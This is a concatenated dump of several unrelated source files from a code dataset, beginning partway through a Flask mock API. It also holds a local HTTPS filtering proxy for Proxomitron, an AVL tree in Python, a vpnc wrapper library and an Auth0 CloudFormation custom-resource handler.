class JubilantMarket(Resource):
def get(self, name, test):
return {"name": name, "test":test}
def post(self):
return {"data": "Posted"}
class GetData(Resource):
def get(self, name):
return names[name]
class MockUserData(Resource):
def get(self, userAddress):
abort_if_useraddr_doesnt_exist(userAddress)
return users[userAddress]
def put(self, userAddress):
abort_if_userAddr_exists(userAddress)
args = user_put_args.parse_args()
users[userAddress] = args
return users[userAddress], 201
def delete(self, userAddress):
abort_if_useraddr_doesnt_exist(userAddress)
del users[userAddress]
return '', 204
class EMF(Resource):
def get(self, userAddress):
# check if existing account
return mockuserdata[userAddress]
def deposit(self, userAddress, action):
return {"userAddress": userAddress, "action": action}
def put(self, userAddress):
return {"data":"Deposit Made!"}
api.add_resource(JubilantMarket, "/jubilantmarket/<string:name>/<int:test>")
api.add_resource(GetData, "/jubilantmarket/<string:name>")
api.add_resource(MockUserData, "/jubilantmarket/mockuserdata/<string:userAddress>")
api.add_resource(EMF, "/jubilantmarket/EMF/<string:userAddress>/<string:action>")
# Emergency Medical Fund Call
# Start Smart Contract
# User Depoists function call (Solidity)
# Parameters
# pass username, user's address, amount of money depoisted from "wallet or bank acct"
# Users's Address Wallet to EMF Wallet Block
# DepoistToEMF(solidity function)
# return statements
#
# OpenVessel deposit function call from user to Stake Pool
# Parameters
#
# EMF Wallet Block hits limit to deposit into Stake Pool Addresss
# # Calling Solidity Code
# contract_id, contract_interface = compile()
# API_USERNAME = config('HOME')
# INFURA = config('PROID')
# API_KEY = config('WEB3_INFURA_API_SECRET')
# CORE_ACCOUNT = config('BUSINESSACCOUNT')
# bytecode = contract_interface['bin']
# abi = contract_interface['abi']
# # flask endpoint will be used as "API" we send Web request to trigger contract lock and transactions
# @app.route('/') #flask instance app fun() route
# def index(): #view functions
# # pip install web3[tester]
# # ERROR: Failed building wheel for pyethash
# return 'passObj'
# # http://127.0.0.1:5000/
# # 172.16.58.3:8000
# # /api/uploadCall routes web request
# # endpoint
# @app.route('/uploadCall', methods=['POST', 'GET']) #flask instance app fun() route
# def UploadCall():
# trigger = False
# # backend validation
# print(request.remote_addr)
# print(request.method)
# NewObj = request.json
# if request.method == 'POST':
# # jsonObj = NewObj['imageData']
# # print(jsonObj)
# print("upload to database")
# trigger = True
# if trigger == True:
# responsPayLoad = {
# "message":"Upload successful",
# }
# return jsonify(responsPayLoad), 200
# if trigger == False:
# responsPayLoad = {
# "message":"Upload Failed",
# }
# return jsonify(responsPayLoad), 200
if __name__ == "__main__":
app.run(debug=True)
``` |
{
"source": "3Lu/privoxy-https-wrapper",
"score": 2
} |
#### File: wrapper/ProxHTTPSProxy/ProxHTTPSProxy.py
```python
"A Proxomitron Helper Program"
_name = 'ProxHTTPSProxyMII'
__author__ = 'phoenix'
__version__ = 'v1.5'
CONFIG = "/etc/ProxHTTPSProxy/config/config.ini"
CA_CERTS = "/etc/ProxHTTPSProxy/cert/cacert.pem"
import os
import time
import configparser
import fnmatch
import logging
import threading
import ssl
import urllib3
from urllib3.contrib.socks import SOCKSProxyManager
#https://urllib3.readthedocs.org/en/latest/security.html#insecurerequestwarning
#urllib3.disable_warnings()
from socketserver import ThreadingMixIn
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import urlparse
from ProxyTool import ProxyRequestHandler, get_cert, counter
from colorama import init, Fore, Back, Style
init(autoreset=True)
class LoadConfig:
def __init__(self, configfile):
self.config = configparser.ConfigParser(allow_no_value=True,
inline_comment_prefixes=('#',))
self.config.read(configfile)
self.PROXADDR = self.config['GENERAL'].get('ProxAddr')
self.FRONTPORT = int(self.config['GENERAL'].get('FrontPort'))
self.REARPORT = int(self.config['GENERAL'].get('RearPort'))
self.DEFAULTPROXY = self.config['GENERAL'].get('DefaultProxy')
self.LOGLEVEL = self.config['GENERAL'].get('LogLevel')
class ConnectionPools:
"""
self.pools is a list of {'proxy': 'http://127.0.0.1:8080',
'pool': urllib3.ProxyManager() object,
'patterns': ['ab.com', 'bc.net', ...]}
self.getpool() is a method that returns pool based on host matching
"""
# Windows default CA certificates are incomplete
# See: http://bugs.python.org/issue20916
# cacert.pem sources:
# - http://curl.haxx.se/docs/caextract.html
# - http://certifi.io/en/latest/
# ssl_version="TLSv1" to specific version
sslparams = dict(cert_reqs="REQUIRED", ca_certs=CA_CERTS)
# IE: http://support2.microsoft.com/kb/181050/en-us
# Firefox about:config
# network.http.connection-timeout 90
# network.http.response.timeout 300
timeout = urllib3.util.timeout.Timeout(connect=90.0, read=300.0)
def __init__(self, config):
self.file = config
self.file_timestamp = os.path.getmtime(config)
self.loadConfig()
def loadConfig(self):
# self.conf has to be inited each time for reloading
self.conf = configparser.ConfigParser(allow_no_value=True, delimiters=('=',),
inline_comment_prefixes=('#',))
self.conf.read(self.file)
self.pools = []
proxy_sections = [section for section in self.conf.sections()
if section.startswith('PROXY')]
for section in proxy_sections:
proxy = section.split()[1]
self.pools.append(dict(proxy=proxy,
pool=self.setProxyPool(proxy),
patterns=list(self.conf[section].keys())))
default_proxy = self.conf['GENERAL'].get('DefaultProxy')
default_pool = (self.setProxyPool(default_proxy) if default_proxy else
[urllib3.PoolManager(num_pools=10, maxsize=8, timeout=self.timeout, **self.sslparams),
urllib3.PoolManager(num_pools=10, maxsize=8, timeout=self.timeout)])
self.pools.append({'proxy': default_proxy, 'pool': default_pool, 'patterns': '*'})
self.noverifylist = list(self.conf['SSL No-Verify'].keys())
self.blacklist = list(self.conf['BLACKLIST'].keys())
self.sslpasslist = list(self.conf['SSL Pass-Thru'].keys())
self.bypasslist = list(self.conf['BYPASS URL'].keys())
def reloadConfig(self):
while True:
mtime = os.path.getmtime(self.file)
if mtime > self.file_timestamp:
self.file_timestamp = mtime
self.loadConfig()
logger.info(Fore.RED + Style.BRIGHT
+ "*" * 20 + " CONFIG RELOADED " + "*" * 20)
time.sleep(1)
def getpool(self, host, httpmode=False):
noverify = True if httpmode or any((fnmatch.fnmatch(host, pattern) for pattern in self.noverifylist)) else False
for pool in self.pools:
if any((fnmatch.fnmatch(host, pattern) for pattern in pool['patterns'])):
return pool['proxy'], pool['pool'][noverify], noverify
def setProxyPool(self, proxy):
scheme = proxy.split(':')[0]
if scheme in ('http', 'https'):
ProxyManager = urllib3.ProxyManager
elif scheme in ('socks4', 'socks5'):
ProxyManager = SOCKSProxyManager
else:
print("Wrong Proxy Format: " + proxy)
print("Proxy should start with http/https/socks4/socks5 .")
input()
raise SystemExit
# maxsize is the max. number of connections to the same server
return [ProxyManager(proxy, num_pools=10, maxsize=8, timeout=self.timeout, **self.sslparams),
ProxyManager(proxy, num_pools=10, maxsize=8, timeout=self.timeout)]
class FrontServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
pass
class RearServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
pass
class FrontRequestHandler(ProxyRequestHandler):
"""
Sit between the client and Proxomitron
Convert https request to http
"""
server_version = "%s FrontProxy/%s" % (_name, __version__)
def do_CONNECT(self):
"Decrypt https request and dispatch to http handler"
# request line: CONNECT www.example.com:443 HTTP/1.1
self.host, self.port = self.path.split(":")
self.proxy, self.pool, self.noverify = pools.getpool(self.host)
if any((fnmatch.fnmatch(self.host, pattern) for pattern in pools.blacklist)):
# BLACK LIST
self.deny_request()
logger.info("%03d " % self.reqNum + Fore.CYAN + 'Denied by blacklist: %s' % self.host)
elif any((fnmatch.fnmatch(self.host, pattern) for pattern in pools.sslpasslist)):
# SSL Pass-Thru
if self.proxy and self.proxy.startswith('https'):
self.forward_to_https_proxy()
elif self.proxy and self.proxy.startswith('socks5'):
self.forward_to_socks5_proxy()
else:
self.tunnel_traffic()
# Upstream server or proxy of the tunnel is closed explictly, so we close the local connection too
self.close_connection = 1
else:
# SSL MITM
self.wfile.write(("HTTP/1.1 200 Connection established\r\n" +
"Proxy-agent: %s\r\n" % self.version_string() +
"\r\n").encode('ascii'))
# commonname = '.' + self.host.partition('.')[-1] if self.host.count('.') >= 2 else self.host
commonname = self.host
dummycert = get_cert(commonname)
# set a flag for do_METHOD
self.ssltunnel = True
ssl_sock = ssl.wrap_socket(self.connection, keyfile=dummycert, certfile=dummycert, server_side=True)
# Ref: Lib/socketserver.py#StreamRequestHandler.setup()
self.connection = ssl_sock
self.rfile = self.connection.makefile('rb', self.rbufsize)
self.wfile = self.connection.makefile('wb', self.wbufsize)
# dispatch to do_METHOD()
self.handle_one_request()
def do_METHOD(self):
"Forward request to Proxomitron"
counter.increment_and_set(self, 'reqNum')
if self.ssltunnel:
# https request
host = self.host if self.port == '443' else "%s:%s" % (self.host, self.port)
url = "https://%s%s" % (host, self.path)
self.bypass = any((fnmatch.fnmatch(url, pattern) for pattern in pools.bypasslist))
if not self.bypass:
url = "http://%s%s" % (host, self.path)
# Tag the request so Proxomitron can recognize it
self.headers["Tagged"] = self.version_string() + ":%d" % self.reqNum
else:
# http request
self.host = urlparse(self.path).hostname
if any((fnmatch.fnmatch(self.host, pattern) for pattern in pools.blacklist)):
# BLACK LIST
self.deny_request()
logger.info("%03d " % self.reqNum + Fore.CYAN + 'Denied by blacklist: %s' % self.host)
return
host = urlparse(self.path).netloc
self.proxy, self.pool, self.noverify = pools.getpool(self.host, httpmode=True)
self.bypass = any((fnmatch.fnmatch('http://' + host + urlparse(self.path).path, pattern) for pattern in pools.bypasslist))
url = self.path
self.url = url
pool = self.pool if self.bypass else proxpool
data_length = self.headers.get("Content-Length")
self.postdata = self.rfile.read(int(data_length)) if data_length and int(data_length) > 0 else None
if self.command == "POST" and "Content-Length" not in self.headers:
buffer = self.rfile.read()
if buffer:
logger.warning("%03d " % self.reqNum + Fore.RED +
'POST w/o "Content-Length" header (Bytes: %d | Transfer-Encoding: %s | HTTPS: %s',
len(buffer), "Transfer-Encoding" in self.headers, self.ssltunnel)
# Remove hop-by-hop headers
self.purge_headers(self.headers)
r = None
# Below code in connectionpool.py expect the headers to has a copy() and update() method
# That's why we can't use self.headers directly when call pool.urlopen()
#
# Merge the proxy headers. Only do this in HTTP. We have to copy the
# headers dict so we can safely change it without those changes being
# reflected in anyone else's copy.
# if self.scheme == 'http':
# headers = headers.copy()
# headers.update(self.proxy_headers)
headers = urllib3._collections.HTTPHeaderDict(self.headers)
try:
# Sometimes 302 redirect would fail with "BadStatusLine" exception, and IE11 doesn't restart the request.
# retries=1 instead of retries=False fixes it.
#! Retry may cause the requests with the same reqNum appear in the log window
r = pool.urlopen(self.command, url, body=self.postdata, headers=headers,
retries=1, redirect=False, preload_content=False, decode_content=False)
if not self.ssltunnel:
if self.bypass:
prefix = '[BP]' if self.proxy else '[BD]'
else:
prefix = '[D]'
if self.command in ("GET", "HEAD"):
logger.info("%03d " % self.reqNum + Fore.MAGENTA + '%s "%s %s" %s %s' %
(prefix, self.command, url, r.status, r.getheader('Content-Length', '-')))
else:
logger.info("%03d " % self.reqNum + Fore.MAGENTA + '%s "%s %s %s" %s %s' %
(prefix, self.command, url, data_length, r.status, r.getheader('Content-Length', '-')))
self.send_response_only(r.status, r.reason)
# HTTPResponse.msg is easier to handle than urllib3._collections.HTTPHeaderDict
r.headers = r._original_response.msg
self.purge_write_headers(r.headers)
if self.command == 'HEAD' or r.status in (100, 101, 204, 304) or r.getheader("Content-Length") == '0':
written = None
else:
written = self.stream_to_client(r)
if "Content-Length" not in r.headers and 'Transfer-Encoding' not in r.headers:
self.close_connection = 1
# Intend to catch regular http and bypass http/https requests exceptions
# Regular https request exceptions should be handled by rear server
except urllib3.exceptions.TimeoutError as e:
self.sendout_error(url, 504, message="Timeout", explain=e)
logger.warning("%03d " % self.reqNum + Fore.YELLOW + '[F] %s on "%s %s"', e, self.command, url)
except (urllib3.exceptions.HTTPError,) as e:
self.sendout_error(url, 502, message="HTTPError", explain=e)
logger.warning("%03d " % self.reqNum + Fore.YELLOW + '[F] %s on "%s %s"', e, self.command, url)
finally:
if r:
# Release the connection back into the pool
r.release_conn()
do_GET = do_POST = do_HEAD = do_PUT = do_DELETE = do_OPTIONS = do_METHOD
class RearRequestHandler(ProxyRequestHandler):
"""
Supposed to be the parent proxy for Proxomitron for tagged requests
Convert http request to https
"""
server_version = "%s RearProxy/%s" % (_name, __version__)
def do_METHOD(self):
"Convert http request to https"
if self.headers.get("Tagged") and self.headers["Tagged"].startswith(_name):
self.reqNum = int(self.headers["Tagged"].split(":")[1])
# Remove the tag
del self.headers["Tagged"]
else:
self.sendout_error(self.path, 400,
explain="The proxy setting of the client is misconfigured.\n\n" +
"Please set the HTTPS proxy port to %s " % config.FRONTPORT +
"and check the Docs for other settings.")
logger.error(Fore.RED + Style.BRIGHT + "[Misconfigured HTTPS proxy port] " + self.path)
return
# request line: GET http://somehost.com/path?attr=value HTTP/1.1
url = "https" + self.path[4:]
self.host = urlparse(self.path).hostname
proxy, pool, noverify = pools.getpool(self.host)
prefix = '[P]' if proxy else '[D]'
data_length = self.headers.get("Content-Length")
self.postdata = self.rfile.read(int(data_length)) if data_length else None
self.purge_headers(self.headers)
r = None
# Below code in connectionpool.py expect the headers to has a copy() and update() method
# That's why we can't use self.headers directly when call pool.urlopen()
#
# Merge the proxy headers. Only do this in HTTP. We have to copy the
# headers dict so we can safely change it without those changes being
# reflected in anyone else's copy.
# if self.scheme == 'http':
# headers = headers.copy()
# headers.update(self.proxy_headers)
headers = urllib3._collections.HTTPHeaderDict(self.headers)
try:
r = pool.urlopen(self.command, url, body=self.postdata, headers=headers,
retries=1, redirect=False, preload_content=False, decode_content=False)
if proxy:
logger.debug('Using Proxy - %s' % proxy)
color = Fore.RED if noverify else Fore.GREEN
if self.command in ("GET", "HEAD"):
logger.info("%03d " % self.reqNum + color + '%s "%s %s" %s %s' %
(prefix, self.command, url, r.status, r.getheader('Content-Length', '-')))
else:
logger.info("%03d " % self.reqNum + color + '%s "%s %s %s" %s %s' %
(prefix, self.command, url, data_length, r.status, r.getheader('Content-Length', '-')))
self.send_response_only(r.status, r.reason)
# HTTPResponse.msg is easier to handle than urllib3._collections.HTTPHeaderDict
r.headers = r._original_response.msg
self.purge_write_headers(r.headers)
if self.command == 'HEAD' or r.status in (100, 101, 204, 304) or r.getheader("Content-Length") == '0':
written = None
else:
written = self.stream_to_client(r)
if "Content-Length" not in r.headers and 'Transfer-Encoding' not in r.headers:
self.close_connection = 1
except urllib3.exceptions.SSLError as e:
self.sendout_error(url, 417, message="SSL Certificate Failed", explain=e)
logger.error("%03d " % self.reqNum + Fore.RED + Style.BRIGHT + "[SSL Certificate Error] " + url)
except urllib3.exceptions.TimeoutError as e:
self.sendout_error(url, 504, message="Timeout", explain=e)
logger.warning("%03d " % self.reqNum + Fore.YELLOW + '[R]%s "%s %s" %s', prefix, self.command, url, e)
except (urllib3.exceptions.HTTPError,) as e:
self.sendout_error(url, 502, message="HTTPError", explain=e)
logger.warning("%03d " % self.reqNum + Fore.YELLOW + '[R]%s "%s %s" %s', prefix, self.command, url, e)
finally:
if r:
# Release the connection back into the pool
r.release_conn()
do_GET = do_POST = do_HEAD = do_PUT = do_DELETE = do_OPTIONS = do_METHOD
"""
#Information#
* Python default ciphers: http://bugs.python.org/issue20995
* SSL Cipher Suite Details of Your Browser: https://cc.dcsec.uni-hannover.de/
* https://wiki.mozilla.org/Security/Server_Side_TLS
"""
try:
if os.name == 'nt':
import ctypes
ctypes.windll.kernel32.SetConsoleTitleW('%s %s' % (_name, __version__))
config = LoadConfig(CONFIG)
logger = logging.getLogger(__name__)
logger.setLevel(getattr(logging, config.LOGLEVEL, logging.INFO))
handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s %(message)s', datefmt='[%H:%M]')
handler.setFormatter(formatter)
logger.addHandler(handler)
pools = ConnectionPools(CONFIG)
proxpool = urllib3.ProxyManager(config.PROXADDR, num_pools=10, maxsize=8,
# A little longer than timeout of rear pool
# to avoid trigger front server exception handler
timeout=urllib3.util.timeout.Timeout(connect=90.0, read=310.0))
frontserver = FrontServer(('', config.FRONTPORT), FrontRequestHandler)
rearserver = RearServer(('', config.REARPORT), RearRequestHandler)
for worker in (frontserver.serve_forever, rearserver.serve_forever,
pools.reloadConfig):
thread = threading.Thread(target=worker)
thread.daemon = True
thread.start()
print("=" * 76)
print('%s %s (urllib3/%s)' % (_name, __version__, urllib3.__version__))
print()
print(' FrontServer : localhost:%s' % config.FRONTPORT)
print(' RearServer : localhost:%s' % config.REARPORT)
print(' ParentServer : %s' % config.DEFAULTPROXY)
print(' Proxomitron : ' + config.PROXADDR)
print("=" * 76)
while True:
time.sleep(1)
except KeyboardInterrupt:
print("Quitting...")
``` |
{
"source": "3lyalvarado/Metodos-basicos",
"score": 2
} |
#### File: Metodos-basicos/Prototipo avl/BaseD.py
```python
import Tabla
class bd:
def __init__(self):
self.idTabla = None
self.arvolTabla = Tabla()
def crear(self, valor):
self.arvolTabla.add(valor)
def borrar(self, valor):
self.arvolTabla.Eliminar(valor)
```
#### File: Metodos-basicos/Prototipo avl/eddP1.py
```python
class Node:
def __init__(self, valor):
self.valor = valor
self.hijo_izquierdo = None
self.hijo_derecho = None
self.altura = 0
class AVLTree:
def __init__(self):
self.raiz = None
def add(self, valor):
self.raiz = self._add(valor, self.raiz)
def _add(self, valor, aux):
if aux is None:
return Node(valor)
elif valor > aux.valor:
aux.hijo_derecho = self._add(valor, aux.hijo_derecho)
if (self.alturaNodo(aux.hijo_derecho)-self.alturaNodo(aux.hijo_izquierdo)) == 2:
if valor > aux.hijo_derecho.valor:
aux = self.RotacionIzquierda(aux)
else:
aux = self.RotacionDobleIzquierda(aux)
else:
aux.hijo_izquierdo = self._add(valor, aux.hijo_izquierdo)
if (self.alturaNodo(aux.hijo_izquierdo)-self.alturaNodo(aux.hijo_derecho)) == 2:
if valor < aux.hijo_izquierdo.valor:
aux = self.RotacionDerecha(aux)
else:
aux = self.RotacionDobleDerecha(aux)
r = self.alturaNodo(aux.hijo_derecho)
l = self.alturaNodo(aux.hijo_izquierdo)
m = self.maxi(r, l)
aux.altura = m+1
return aux
def alturaNodo(self, aux):
if aux is None:
return -1
else:
return aux.altura
def maxi(self, r, l):
return (l, r)[r > l]
def RotacionDerecha(self, t1):
t2 = t1.hijo_izquierdo
t1.hijo_izquierdo = t2.hijo_derecho
t2.hijo_derecho = t1
t1.altura = self.maxi(self.alturaNodo(
t1.hijo_izquierdo), self.alturaNodo(t1.hijo_derecho))+1
t2.altura = self.maxi(self.alturaNodo(t2.hijo_izquierdo), t1.altura)+1
return t2
def RotacionIzquierda(self, t1):
t2 = t1.hijo_derecho
t1.hijo_derecho = t2.hijo_izquierdo
t2.hijo_izquierdo = t1
t1.altura = self.maxi(self.alturaNodo(
t1.hijo_izquierdo), self.alturaNodo(t1.hijo_derecho))+1
t2.altura = self.maxi(self.alturaNodo(t2.hijo_izquierdo), t1.altura)+1
return t2
def RotacionDobleDerecha(self, aux):
aux.hijo_izquierdo = self.RotacionIzquierda(aux.hijo_izquierdo)
return self.RotacionDerecha(aux)
def RotacionDobleIzquierda(self, aux):
aux.hijo_derecho = self.RotacionDerecha(aux.hijo_derecho)
return self.RotacionIzquierda(aux)
def _Eliminar(self, valor):
self.raiz = self.Eliminar(valor, self.raiz)
def Eliminar(self, valor, nodo):
if nodo is None:
print("Elemento no encontrado")
return None
elif (nodo.valor > valor):
nodo.hijo_izquierdo = self.Eliminar(valor, nodo.hijo_izquierdo)
elif (nodo.valor < valor):
nodo.hijo_derecho = self.Eliminar(valor, nodo.hijo_derecho)
elif (nodo.hijo_izquierdo != None and nodo.hijo_derecho != None):
aux = self.EncontrarMenor(nodo.hijo_derecho)
nodo.valor = aux.valor
nodo.hijo_derecho = self.Eliminar(nodo.valor, nodo.hijo_derecho)
else:
aux = nodo
if (nodo.hijo_izquierdo is None):
nodo = nodo.hijo_derecho
elif (nodo.hijo_derecho is None):
nodo = nodo.hijo_izquierdo
del aux
if (nodo is None):
return nodo
nodo.altura = self.maxi(self.alturaNodo(
nodo.hijo_izquierdo), self.alturaNodo(nodo.hijo_derecho)) + 1
balance = self.GetBalance(nodo)
if (balance < -1):
if (self.GetBalance(nodo.hijo_derecho) <= 0):
return self.RotacionIzquierda(nodo)
else:
return self.RotacionDobleIzquierda(nodo)
elif (balance > 1):
if (self.GetBalance(nodo.hijo_izquierdo) >= 0):
return self.RotacionDerecha(nodo)
else:
return self.RotacionDobleDerecha(nodo)
return nodo
def GetBalance(self, nodo):
if (nodo is None):
return 0
return (self.alturaNodo(nodo.hijo_izquierdo) - self.alturaNodo(nodo.hijo_derecho))
def EncontrarMenor(self, nodo):
if nodo is None:
return None
elif (nodo.hijo_izquierdo is None):
return nodo
else:
return self.EncontrarMenor(nodo.hijo_izquierdo)
def preorder(self):
self._preorder(self.raiz)
def _preorder(self, aux):
if aux:
print(aux.valor, end=' ')
self._preorder(aux.hijo_izquierdo)
self._preorder(aux.hijo_derecho)
def inorder(self):
self._inorder(self.raiz)
def _inorder(self, aux):
if aux:
self._inorder(aux.hijo_izquierdo)
print(aux.valor, end=' ')
self._inorder(aux.hijo_derecho)
def postorder(self):
self._postorder(self.raiz)
def _postorder(self, aux):
if aux:
self._postorder(aux.hijo_izquierdo)
self._postorder(aux.hijo_derecho)
print(aux.valor, end=' ')
def getValor(self, nodo):
return nodo.valor
CADENA=""
Count=0
def GetDotArbol(self, inicio):
self.Count+=1
# nodo = str(inicio.valor) + " [label=\"" + str(inicio.valor) + "]\n"
nodo = ""
if (inicio.hijo_izquierdo != None):
nodo += str(inicio.valor) + " -> " + \
str(self.getValor(inicio.hijo_izquierdo))+"\n"
self.GetDotArbol(inicio.hijo_izquierdo)
if (inicio.hijo_derecho != None):
nodo += str(inicio.valor) + " -> " + \
str(self.getValor(inicio.hijo_derecho)) + "\n"
self.GetDotArbol(inicio.hijo_derecho)
self.CADENA+=nodo
return nodo
def PRINT(self,raiz):
self.GetDotArbol(raiz)
x="\nDigraph Arbol{\nrankdir = TB;\nnode[shape = circle];\n"+self.CADENA+"}"
print(x)
t = AVLTree()
t.add(56)
t.add(61)
t.add(68)
t.add(89)
t.add(100)
t.add(1)
t.add(12)
t.add(19)
t.add(10)
t.add(15)
t.add(58)
t.add(9)
#t._Eliminar(15)
# t._Eliminar(10)
# t._Eliminar(9)
t.preorder()
print()
t.inorder()
print()
t.postorder()
# t.preorder()
# print()
# t.inorder()
# print()
# t.postorder()
t.PRINT(t.raiz)
``` |
{
"source": "3mb3dw0rk5/pyvpnc",
"score": 3
} |
#### File: pyvpnc/vpnc/__init__.py
```python
from __future__ import print_function
import signal
import sys
import os
import subprocess
from contextlib import contextmanager
HERE = os.path.dirname(os.path.realpath(__file__))
class ProcessException(Exception):
def __init__(self, returncode, cmd, stdout, stderr):
self.returncode = returncode
self.cmd = cmd
self.stdout = stdout
self.stderr = stderr
def __str__(self):
if self.returncode and self.returncode < 0:
try:
return "Command '%s' died with %r." % (
self.cmd, signal.Signals(-self.returncode))
except ValueError:
return "Command '%s' died with unknown signal %d." % (
self.cmd, -self.returncode)
else:
return "Command '%s' returned non-zero exit status %d." % (
self.cmd, self.returncode)
def process_call(cmd):
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode:
raise ProcessException(process.returncode, process.args, stdout, stderr)
return process.returncode, stdout, stderr
class VPNC(object):
def __init__(self, config=None,
config_file="tempvpnc.conf",
config_folder=None):
self.config = config or dict()
self.config_file = config_file
self.temp_config_path = os.path.join(HERE, self.config_file)
self.config_folder = config_folder
if config_folder is None:
if sys.platform.startswith("linux"):
self.config_folder = "/etc/vpnc"
elif sys.platform.startswith("darwin"):
self.config_folder = "/usr/local/etc/vpnc"
self.config_path = os.path.join(self.config_folder, self.config_file)
def create_config_file(self):
"""Creates a formatted VPNC config file."""
with open(self.temp_config_path, "w+") as f:
print("IPSec gateway %(IPSec_gateway)s\n"
"IPSec ID %(IPSec_ID)s\n"
"IPSec secret %(IPSec_secret)s\n"
"IKE Authmode %(IKE_Authmode)s\n"
"Xauth username %(Xauth_username)s\n"
"Xauth password %(Xauth_password)s" % self.config,
file=f)
def move_config_file(self):
"""Moves the VPNC config file to /etc/vpnc (Linux) or
/usr/local/etc/vpnc/ (OSX).
"""
process_call(["mv", self.temp_config_path, self.config_folder])
process_call(["chown", "root:root", self.config_path])
process_call(["chmod", "600", self.config_path])
def remove_config_file(self):
"""Removes the auto-generated VPNC config file."""
try:
process_call(["rm", self.config_path])
return True
except subprocess.CalledProcessError:
return False
def connect(self):
"""Connects to VPNC."""
self.create_config_file()
self.move_config_file()
process_call(["vpnc", "tempvpnc"])
def disconnect(self):
"""Disconnects from VPNC."""
process_call(["vpnc-disconnect"])
self.remove_config_file()
@contextmanager
def vpn(self):
"""Creates VPN context."""
self.connect()
yield
self.disconnect()
``` |
{
"source": "3mcloud/aws-auth0-custom-resource",
"score": 2
} |
#### File: aws-auth0-custom-resource/src/api.py
```python
import logging
import boto3
from crhelper import CfnResource
from auth0.v3.exceptions import Auth0Error
from .utils import config
from .lambdatype import LambdaDict, LambdaContext
from .validation.api import auth0Validator
logger = logging.getLogger('aws-auth0-cr')
secrets_client = boto3.client('secretsmanager')
def create(event: LambdaDict, _: LambdaContext, helper: CfnResource) -> str:
"""
Create an api with the given identifier
"""
props = event['ResourceProperties']
validated = auth0Validator.validated(props)
if not validated:
raise Exception(auth0Validator.errors)
provider = config.get_provider(props.get('Tenant'))
api_id = provider.create_api(**validated)
helper.Data['ApiId'] = api_id
helper.Data['Audience'] = props.get('Audience')
return api_id
def update(event: LambdaDict, _: LambdaContext, helper: CfnResource) -> str:
"""
Update an API
"""
props = event['ResourceProperties']
validated = auth0Validator.validated(props)
if not validated:
raise Exception(auth0Validator.errors)
provider = config.get_provider(props.get('Tenant'))
api_id = event['PhysicalResourceId']
# Handle audience change with creating a new resource
if props['Audience'] != event['OldResourceProperties']['Audience']:
logger.info('New audience, deleting old resource and creating a new one.')
api_id = provider.create_api(**validated)
delete_handle_err(provider, event['PhysicalResourceId'])
else:
del validated['identifier']
provider.update_api(event['PhysicalResourceId'], **validated)
helper.Data['ApiId'] = api_id
helper.Data['Audience'] = props.get('Audience')
return event['PhysicalResourceId']
def delete(event: LambdaDict, context: LambdaContext, helper: CfnResource): # pylint: disable=unused-argument
"""Delete an api"""
props = event['ResourceProperties']
provider = config.get_provider(props['Tenant'])
delete_handle_err(provider, event['PhysicalResourceId'])
def delete_handle_err(provider, api_id):
"""Delete an API and handle the errors"""
try:
# deleting an api id that doesn't exist does not raise exception
# see e2e/test_errors.py
provider.delete_api(api_id)
except Auth0Error as err:
logger.error(err)
if 'Path validation error' in err.message:
logger.error('physical resource id is not a \
valid id. Assuming this failed to create.')
return
raise
```
#### File: src/auth0_provider/index.py
```python
import logging
import json
import time
import boto3
from auth0.v3.authentication import GetToken
from auth0.v3.management import Auth0
from src.utils import secret
logger = logging.getLogger()
logger.setLevel(logging.INFO)
# Page limit for auth0 in case of run-away pagination
PAGE_LIMIT = 60
class Auth0Provider():
"""
Generic Cloudformation custom resource provider for Auth0 resources.
"""
def __init__(self, management_secret, tenant):
"""Default constructor
Args:
management_secret (str): secrets manager location for the management api credentials
tenant (str): Auth0 tenant, e.g. mmm-dev
"""
self.secrets_manager = boto3.client('secretsmanager')
admin = json.loads(secret.get_secret(
self.secrets_manager, management_secret, logger))
self.authenticate(
tenant,
admin['AUTH0_CLIENT_ID'],
admin['AUTH0_CLIENT_SECRET']
)
def authenticate(self, tenant, client_id, client_secret):
"""Sets up an authenticated client
Args:
tenant (str): tenant name for auth0
client_id (str): id of the application authorized to use the management api
client_secret (str): client secret for the above application
"""
get_token = GetToken(tenant)
logger.info('Getting token for tenant %s with client %s', tenant, client_id)
token = get_token.client_credentials(
client_id, client_secret, 'https://{}/api/v2/'.format(tenant))
mgmt_api_token = token['access_token']
self.auth0 = Auth0(tenant, mgmt_api_token)
return self.auth0
def create_application(self, **kwargs):
"""Create an Auth0 Application (Client)
Args:
name (str): Name of the application, e.g. myapp
app_type (str): Type of application - spa, m2m, native, or web
"""
client = self.auth0.clients.create(kwargs)
return client['client_id'], client['client_secret']
def create_api(self, **kwargs):
"""Create an Auth0 API (Resource)
Args:
name (str): Name of the api, e.g. myapi
audience (str): Audience url, must include http:// or https://
"""
server = self.auth0.resource_servers.create(kwargs)
return server['id']
def create_grant(self, audience, application_id):
"""Create an Auth0 grant (client_grant)
Args:
audience (str): Audience url, must include http:// or https://
application_id (str): ID of the application
"""
grant = self.auth0.client_grants.create(
{'client_id': application_id, 'audience': audience, 'scope': []})
return grant['id']
def create_resource(self, url, name):
"""Create an auth0 resource
Creates a client (application), resource server (api), and a grant for the client to use
the resource server.
Args:
url (str): Url for the API, e.g. appsync url
name (str): Name for the client and resource server
"""
client = self.auth0.clients.create(
{'name': name, 'app_type': 'non_interactive'})
server = self.auth0.resource_servers.create(
{'name': name, 'identifier': url})
grant_id = self.auth0.client_grants.create(
{'client_id': client['client_id'], 'audience': url, 'scope': []})
return client['client_id'], client['client_secret'], server['id'], grant_id['id']
def rotate_client_secret(self, client_id):
"""Rotate a client secret
Args:
client_id (str): ID of the client to rotate the secret for
"""
resp = self.auth0.clients.rotate_secret(client_id)
return resp['client_secret']
def update_resource(self):
"""Update a resource"""
# Nothing to update at the moment
def update_api(self, audience, **kwargs):
"""Update an api
Args:
**kwargs (dict): configuration of the auth0 client
"""
self.auth0.resource_servers.update(audience, kwargs)
def get_resource_server(self, url):
"""Gets the id of a resource server based on the audience
Args:
url (str): Url associated with the resource server
"""
page = 0
prev = []
while page is not None:
resource_list = self.auth0.resource_servers.get_all(
page=page, per_page=50)
# If there is only one page, get_all will return the same
# value for every page
if prev == resource_list:
break
prev = resource_list
if resource_list == []:
break
for resource in resource_list:
if resource['identifier'] == url:
